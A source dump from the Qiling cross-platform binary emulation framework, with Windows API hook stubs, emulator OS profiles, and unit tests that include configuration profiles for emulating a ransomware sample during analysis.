/qiling/os/windows/dlls/kernel32/psapi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.os.windows.api import * 8 | from qiling.os.windows.fncc import * 9 | 10 | # BOOL GetModuleInformation( 11 | # HANDLE hProcess, 12 | # HMODULE hModule, 13 | # LPMODULEINFO lpmodinfo, 14 | # DWORD cb 15 | # ); 16 | @winsdkapi(cc=STDCALL, params={ 17 | 'hProcess' : HANDLE, 18 | 'hModule' : HMODULE, 19 | 'lpmodinfo' : LPMODULEINFO, 20 | 'cb' : DWORD 21 | }) 22 | def hook_K32GetModuleInformation(ql: Qiling, address: int, params): 23 | # TODO 24 | return 0 25 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/kernel32/timezoneapi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.os.windows.api import * 8 | from qiling.os.windows.const import * 9 | from qiling.os.windows.fncc import * 10 | 11 | # DWORD GetTimeZoneInformation( 12 | # [out] LPTIME_ZONE_INFORMATION lpTimeZoneInformation 13 | # ); 14 | @winsdkapi(cc=STDCALL, params={ 15 | 'lpTimeZoneInformation' : LPTIME_ZONE_INFORMATION 16 | }) 17 | def hook_GetTimeZoneInformation(ql: Qiling, address: int, params): 18 | # TODO: implement this later. fail for now 19 | return TIME_ZONE_ID_INVALID 20 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/kernel32/wow64apiset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.exception import QlErrorNotImplemented 8 | from qiling.os.windows.api import * 9 | from qiling.os.windows.fncc import * 10 | 11 | # BOOL IsWow64Process( 12 | # HANDLE hProcess, 13 | # PBOOL Wow64Process 14 | # ); 15 | @winsdkapi(cc=STDCALL, params={ 16 | 'hProcess' : HANDLE, 17 | 'Wow64Process' : PBOOL 18 | }) 19 | def hook_IsWow64Process(ql: Qiling, address: int, params): 20 | Wow64Process = params["Wow64Process"] 21 | 22 | if ql.arch.bits != 32: 23 | raise QlErrorNotImplemented("API not implemented") 24 | 25 | false = b'\x00' 26 | # true = b'\x01' 27 | 28 | ql.mem.write(Wow64Process, false) 29 | 30 | return 1 31 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/mscoree.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.os.windows.api import * 8 | from qiling.os.windows.fncc import * 9 | 10 | # void STDMETHODCALLTYPE CorExitProcess ( 11 | # int exitCode 12 | # ); 13 | @winsdkapi(cc=STDCALL, params={ 14 | 'exitCode' : INT 15 | }) 16 | def hook_CorExitProcess(ql: Qiling, address: int, params): 17 | ql.emu_stop() 18 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/msi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.os.windows.api import * 8 | from qiling.os.windows.const import * 9 | from qiling.os.windows.fncc import * 10 | 11 | # UINT MsiGetComponentStateA( 12 | # MSIHANDLE hInstall, 13 | # LPCSTR szComponent, 14 | # INSTALLSTATE *piInstalled, 15 | # INSTALLSTATE *piAction 16 | # ); 17 | @winsdkapi(cc=STDCALL, params={ 18 | 'hInstall' : MSIHANDLE, 19 | 'szComponent' : LPCSTR, 20 | 'piInstalled' : INSTALLSTATE, 21 | 'piAction' : INSTALLSTATE 22 | }) 23 | def hook_MsiGetComponentStateA(ql: Qiling, address: int, params): 24 | return ERROR_INVALID_HANDLE 25 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/msvbvm60.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/ucrtbased.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | # This dll is almost functionally identical to msvcrt, just use hooks from there 7 | from qiling.os.windows.dlls.msvcrt import * 8 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/wudplatform.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.os.windows.api import * 8 | from qiling.os.windows.fncc import * 9 | 10 | @winsdkapi(cc=STDCALL, params={}) 11 | def hook_WudfIsUserDebuggerPresent(ql: Qiling, address: int, params): 12 | return 0 13 | 14 | 15 | @winsdkapi(cc=STDCALL, params={}) 16 | def hook_WudfIsAnyDebuggerPresent(ql: Qiling, address: int, params): 17 | return 0 18 | 19 | 20 | @winsdkapi(cc=STDCALL, params={}) 21 | def hook_WudfIsKernelDebuggerPresent(ql: Qiling, address: int, params): 22 | return 0 23 | -------------------------------------------------------------------------------- /qiling/os/windows/fncc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from functools import wraps 7 | from typing import Any, Mapping 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_INTERCEPT 11 | 12 | # calling conventions 13 | STDCALL = 1 14 | CDECL = 2 15 | MS64 = 3 16 | 17 | def winsdkapi(cc: int, params: Mapping[str, Any] = {}, passthru: bool = False): 18 | def decorator(func): 19 | @wraps(func) 20 | def wrapper(ql: Qiling, pc: int, api_name: str): 21 | ql.os.fcall = ql.os.fcall_select(cc) 22 | 23 | onenter = ql.os.user_defined_api[QL_INTERCEPT.ENTER].get(api_name) 24 | onexit = ql.os.user_defined_api[QL_INTERCEPT.EXIT].get(api_name) 25 | 26 | return ql.os.call(pc, func, params, onenter, onexit, passthru=passthru) 27 | 28 | return wrapper 29 | 30 | return decorator 31 | -------------------------------------------------------------------------------- /qiling/profiles/dos.ql: -------------------------------------------------------------------------------- 1 | [KERNEL] 2 | version = 7 3 | ticks_per_second = 18.206 4 | 5 | [COM] 6 | start_cs = 0x75A 7 | start_ip = 0x100 8 | start_sp = 0xFFFE 9 | stack_size = 0x4000 10 | base_address = 0x7000 11 | 12 | [MISC] 13 | current_path = A:\ -------------------------------------------------------------------------------- /qiling/profiles/freebsd.ql: -------------------------------------------------------------------------------- 1 | [CODE] 2 | ram_size = 0xa00000 3 | entry_point = 0x1000000 4 | 5 | 6 | [OS64] 7 | stack_address = 0x7ffffffde000 8 | stack_size = 0x21000 9 | load_address = 0x7ffbf0100000 10 | interp_address = 0x7ffff7dd5000 11 | mmap_address = 0x7fffb7dd6000 12 | 13 | 14 | [KERNEL] 15 | uid = 1000 16 | gid = 1000 17 | pid = 1996 18 | 19 | 20 | [MISC] 21 | current_path = / 22 | 23 | 24 | [NETWORK] 25 | # To use IPv6 or not, to avoid binary double bind. ipv6 and ipv4 bind the same port at the same time 26 | bindtolocalhost = True 27 | # Bind to localhost 28 | ipv6 = False -------------------------------------------------------------------------------- /qiling/profiles/linux.ql: -------------------------------------------------------------------------------- 1 | [CODE] 2 | # ram_size 0xa00000 is 10MB 3 | ram_size = 0xa00000 4 | entry_point = 0x1000000 5 | 6 | 7 | [OS64] 8 | stack_address = 0x7ffffffd0000 9 | stack_size = 0x30000 10 | load_address = 0x555555554000 11 | interp_address = 0x7ffff7dd5000 12 | mmap_address = 0x7fffb7dd6000 13 | vsyscall_address = 0xffffffffff600000 14 | 15 | 16 | [OS32] 17 | stack_address = 0x7ff0d000 18 | stack_size = 0x30000 19 | load_address = 0x56555000 20 | interp_address = 0x047ba000 21 | # used to be 0x90000000, but changed to comply with MIPS reserved areas 22 | mmap_address = 0x01000000 23 | 24 | 25 | [KERNEL] 26 | uid = 1000 27 | gid = 1000 28 | pid = 1996 29 | 30 | 31 | [MISC] 32 | current_path = / 33 | 34 | 35 | [NETWORK] 36 | # override the ifr_name field in ifreq structures to match the hosts network interface name. 37 | # that fixes certain socket ioctl errors where the requested interface name does not match the 38 | # one on the host. comment out to avoid override 39 | ifrname_override = eth0 40 | 41 | # To use IPv6 or not, to avoid binary double bind. ipv6 and ipv4 bind the same port at the same time 42 | bindtolocalhost = True 43 | # Bind to localhost 44 | ipv6 = False 45 | -------------------------------------------------------------------------------- /qiling/profiles/macos.ql: -------------------------------------------------------------------------------- 1 | [LOADER] 2 | slide = 0x0000000000000000 3 | dyld_slide = 0x0000000500000000 4 | 5 | 6 | [OS64] 7 | stack_address = 0x7ffcf0000000 8 | stack_size = 0x19a00000 9 | vmmap_trap_address = 0x4000000f4000 10 | mmap_address = 0x7ffbf0100000 11 | heap_address = 0x500000000 12 | heap_size = 0x5000000 13 | 14 | 15 | [CODE] 16 | # ram_size 0xa00000 is 10MB 17 | ram_size = 0xa00000 18 | entry_point = 0x1000000 19 | 20 | 21 | [KERNEL] 22 | uid = 1000 23 | gid = 1000 24 | pid = 1996 25 | 26 | 27 | [MISC] 28 | current_path = / 29 | 30 | 31 | [NETWORK] 32 | # To use IPv6 or not, to avoid binary double bind. ipv6 and ipv4 bind the same port at the same time 33 | ipv6 = False 34 | # Bind to localhost 35 | bindtolocalhost = True -------------------------------------------------------------------------------- /qiling/profiles/qnx.ql: -------------------------------------------------------------------------------- 1 | [CODE] 2 | # ram_size 0xa00000 is 10MB 3 | ram_size = 0xa00000 4 | entry_point = 0x1000000 5 | 6 | 7 | [OS32] 8 | stack_address = 0x7ff0d000 9 | stack_size = 0x30000 10 | load_address = 0x56555000 11 | interp_address = 0x047ba000 12 | mmap_address = 0x774bf000 13 | syspage_address = 0xfc404000 14 | cpupage_address = 0xfc4048d8 15 | cpupage_tls_address = 0xfc405000 16 | tls_data_address = 0xfc406000 17 | 18 | 19 | [KERNEL] 20 | uid = 1000 21 | gid = 1000 22 | pid = 1996 23 | 24 | 25 | [MISC] 26 | current_path = / 27 | 28 | 29 | [NETWORK] 30 | # To use IPv6 or not, to avoid binary double bind. ipv6 and ipv4 bind the same port at the same time 31 | bindtolocalhost = True 32 | # Bind to localhost 33 | ipv6 = False 34 | -------------------------------------------------------------------------------- /qiling/profiles/uefi.ql: -------------------------------------------------------------------------------- 1 | [DXE] 2 | heap_address = 0x04000000 3 | heap_size = 0x01000000 4 | stack_address = 0x05000000 5 | stack_size = 0x00080000 6 | image_address = 0x00100000 7 | 8 | [SMM] 9 | smram_base = 0x70000000 10 | smram_size = 0x08000000 11 | heap_address = 0x77000000 12 | heap_size = 0x00800000 13 | # allocated somewhere in smram; address stored in gSmmInitStack 14 | stack_address = 0x77ff0000 15 | # PcdCpuSmmStackSize 16 | stack_size = 0x00010000 17 | image_address = 0x70100000 18 | 19 | [HOB_LIST] 20 | # EFI_GLOBAL_VARIABLE 21 | Guid = 7739f24c-93d7-11d4-9a3a-0090273fc14d 22 | # the HOB list must end with an entry whose HobType is FFFF 23 | TableData = FFFF000000000000 24 | 25 | [DXE_SERVICE_TABLE] 26 | Guid = 05ad34ba-6f02-4214-952e-4da0398e2bb9 27 | 28 | [SMM_RUNTIME_SERVICES_TABLE] 29 | Guid = 395c33fe-287f-413e-a055-8088c0e1d43e 30 | 31 | [LOADED_IMAGE_PROTOCOL] 32 | Guid = 5b1b31a1-9562-11d2-8e3f-00a0c969723b 33 | 34 | [MISC] 35 | current_path = / 36 | -------------------------------------------------------------------------------- /tests/README: -------------------------------------------------------------------------------- 1 | This folder includes the testsuite for CI, such as Travis. 2 | -------------------------------------------------------------------------------- /tests/profiles/uboot_bin.ql: -------------------------------------------------------------------------------- 1 | [CODE] 2 | ram_size = 0xa00000 3 | entry_point = 0x80800000 4 | heap_size = 0x300000 5 | 6 | 7 | [MISC] 8 | current_path = / 9 | -------------------------------------------------------------------------------- /tests/profiles/windows_gandcrab_admin.ql: -------------------------------------------------------------------------------- 1 | [REGISTRY] 2 | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier = None 3 | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString = None 4 | 5 | -------------------------------------------------------------------------------- /tests/profiles/windows_gandcrab_russian_keyboard.ql: -------------------------------------------------------------------------------- 1 | [REGISTRY] 2 | HKEY_CURRENT_USER\Keyboard Layout\Preload\1 = 00000419 3 | -------------------------------------------------------------------------------- /tests/profiles/windows_gandcrab_user.ql: -------------------------------------------------------------------------------- 1 | [SYSTEM] 2 | permission = user 3 | -------------------------------------------------------------------------------- /tests/qdb_scripts/arm.qdb: -------------------------------------------------------------------------------- 1 | # This line is demonstrate comment in qdb script 2 | 3 | x/10wx 0x7ff3cee4 4 | x $sp 5 | x $sp + 0x10 6 | x/5i 0x047ba9e0 7 | b 0x047ba9ec 8 | c 9 | s 10 | n 11 | p 12 | p 13 | q 14 | -------------------------------------------------------------------------------- /tests/qdb_scripts/mips32el.qdb: -------------------------------------------------------------------------------- 1 | # This line is demonstrate comment in qdb script 2 | 3 | x/10wx 0x7ff3cec0 4 | x $sp 5 | x $sp + 0x10 6 | x/5i 0x047bac40 7 | b 0x047bac50 8 | c 9 | s 10 | n 11 | p 12 | p 13 | q 14 | -------------------------------------------------------------------------------- /tests/qdb_scripts/x86.qdb: -------------------------------------------------------------------------------- 1 | # This line is demonstrate comment in qdb script 2 | 3 | x/4wx 0x7ff3cee0 4 | x $esp 5 | x $esp + 0x4 6 | x/5i 0x047bac70 7 | s 8 | n 9 | p 10 | p 11 | q 12 | -------------------------------------------------------------------------------- /tests/test_dos.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys, unittest 7 | sys.path.append('..') 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_INTERCEPT, QL_VERBOSE 11 | 12 | class Checklist: 13 | def __init__(self) -> None: 14 | self.visited_onenter = False 15 | self.visited_onexit = False 16 | 17 | class DOSTest(unittest.TestCase): 18 | 19 | def test_dos_8086_hello(self): 20 | ql = Qiling(["../examples/rootfs/8086/dos/HI.DOS_COM"], "../examples/rootfs/8086/dos", verbose=QL_VERBOSE.DEBUG) 21 | ck = Checklist() 22 | 23 | def onenter(ql: Qiling): 24 | ck.visited_onenter = True 25 | 26 | def onexit(ql: Qiling): 27 | ck.visited_onexit = True 28 | 29 | ql.os.set_api((0x21, 0x09), onexit, QL_INTERCEPT.EXIT) 30 | ql.os.set_api((0x21, 0x4c), onenter, QL_INTERCEPT.ENTER) 31 | 32 | ql.run() 33 | 34 | self.assertTrue(ck.visited_onenter) 35 | self.assertTrue(ck.visited_onexit) 36 | 37 | if __name__ == "__main__": 38 | unittest.main() 39 | -------------------------------------------------------------------------------- /tests/test_dos_exe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys, unittest 7 | sys.path.append('..') 8 | 9 | from qiling import Qiling 10 | 11 | class DOSTest(unittest.TestCase): 12 | 13 | def test_dos_8086_hello(self): 14 | ql = Qiling(["../examples/rootfs/8086/dos/ARKA.DOS_EXE"], "../examples/rootfs/8086/dos") 15 | 16 | # TODO: missing implemention of INT 3Ch and INT 03h 17 | with self.assertRaises(NotImplementedError): 18 | ql.run() 19 | 20 | if __name__ == "__main__": 21 | unittest.main() 22 | -------------------------------------------------------------------------------- /tests/test_macho.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import unittest 7 | 8 | import sys 9 | 10 | sys.path.append("..") 11 | 12 | from qiling import Qiling 13 | from qiling.arch.models import X86_CPU_MODEL 14 | from qiling.const import QL_VERBOSE 15 | 16 | 17 | ROOTFS = r'../examples/rootfs/x8664_macos' 18 | 19 | 20 | class MACHOTest(unittest.TestCase): 21 | def test_macho_macos_x8664(self): 22 | ql = Qiling([fr'{ROOTFS}/bin/x8664_hello'], ROOTFS, cputype=X86_CPU_MODEL.INTEL_HASWELL, verbose=QL_VERBOSE.DEBUG) 23 | ql.run() 24 | 25 | def test_usercorn_x8664(self): 26 | ql = Qiling([fr'{ROOTFS}/bin/x8664_hello_usercorn'], ROOTFS, cputype=X86_CPU_MODEL.INTEL_HASWELL, verbose=QL_VERBOSE.DEBUG) 27 | ql.run() 28 | 29 | 30 | if __name__ == "__main__": 31 | unittest.main() 32 | -------------------------------------------------------------------------------- /tests/test_macho.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # 4 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 5 | # 6 | 7 | python3 ./test_macho_kext.py && python3 ./test_macho.py 8 | -------------------------------------------------------------------------------- /tests/test_onlinux.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # 4 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 5 | # 6 | 7 | python3 ./test_posix.py && 8 | python3 ./test_elf_multithread.py && 9 | python3 ./test_elf_ko.py && 10 | python3 ./test_debugger.py && 11 | python3 ./test_uefi.py && 12 | python3 ./test_shellcode.py && 13 | python3 ./test_edl.py && 14 | python3 ./test_qnx.py && 15 | python3 ./test_android.py && 16 | python3 ./test_mcu.py && 17 | python3 ./test_blob.py && 18 | python3 ./test_qdb.py && 19 | python3 ./test_tendaac15_httpd.py && 20 | echo "Done Test" 21 | -------------------------------------------------------------------------------- /tests/test_pe.bat: -------------------------------------------------------------------------------- 1 | @echo on 2 | REM 3 | REM Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | REM Built on top of Unicorn emulator (www.unicorn-engine.org) 5 | 6 | python test_pe.py && python test_windows_stdio.py && python test_peshellcode.py && python test_windows_debugger.py && python test_dos.py && python test_pe_sys.py 7 | -------------------------------------------------------------------------------- /tests/test_posix.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import unittest 7 | 8 | from test_elf import * 9 | from test_riscv import * 10 | from test_qltool import * 11 | 12 | if __name__ == "__main__": 13 | unittest.main() 14 | -------------------------------------------------------------------------------- /tests/test_qdb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys, unittest 7 | 8 | sys.path.append("..") 9 | from qiling import Qiling 10 | 11 | class DebuggerTest(unittest.TestCase): 12 | 13 | def test_qdb_mips32el_hello(self): 14 | rootfs = "../examples/rootfs/mips32el_linux" 15 | path = rootfs + "/bin/mips32el_hello" 16 | 17 | ql = Qiling([path], rootfs) 18 | ql.debugger = "qdb::rr:qdb_scripts/mips32el.qdb" 19 | ql.run() 20 | del ql 21 | 22 | def test_qdb_arm_hello(self): 23 | rootfs = "../examples/rootfs/arm_linux" 24 | path = rootfs + "/bin/arm_hello" 25 | 26 | ql = Qiling([path], rootfs) 27 | ql.debugger = "qdb::rr:qdb_scripts/arm.qdb" 28 | ql.run() 29 | del ql 30 | 31 | def test_qdb_x86_hello(self): 32 | rootfs = "../examples/rootfs/x86_linux" 33 | path = rootfs + "/bin/x86_hello" 34 | 35 | ql = Qiling([path], rootfs) 36 | ql.debugger = "qdb::rr:qdb_scripts/x86.qdb" 37 | ql.run() 38 | del ql 39 | 40 | if __name__ == "__main__": 41 | unittest.main() 42 | --------------------------------------------------------------------------------